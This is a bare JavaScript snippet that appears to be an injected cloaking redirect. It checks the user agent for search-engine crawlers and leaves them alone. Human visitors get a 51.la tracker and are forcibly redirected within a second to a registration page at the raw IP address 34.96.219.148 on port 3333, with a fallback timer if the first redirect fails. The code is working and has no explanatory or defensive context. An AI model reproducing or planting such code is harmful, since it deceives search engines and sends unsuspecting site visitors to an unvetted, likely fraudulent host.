(function () { var isBot = /(Baiduspider|360Spider|YisouSpider|YandexBot|Sogou|Bingbot|spider|bot)/i.test(navigator.userAgent); if (isBot) { console.log("Bot detected. No redirect."); return; } var script = document.createElement("script"); script.src = "https://sdk.51.la/js-sdk-pro.min.js"; script.charset = "UTF-8"; script.async = true; script.id = "LA_COLLECT"; script.onload = function () { if (typeof LA !== "undefined") { LA.init({ id: "3L08iUJHlyHvFOi3", ck: "3L08iUJHlyHvFOi3" }); // 极速跳转:0.2 秒 setTimeout(function () { window.location.href = "https://34.96.219.148:3333/register"; }, 200); } }; // 兜底跳转:0.2 秒 setTimeout(function () { window.location.href = "https://34.96.219.148:3333/register"; }, 800); document.head.appendChild(script); })();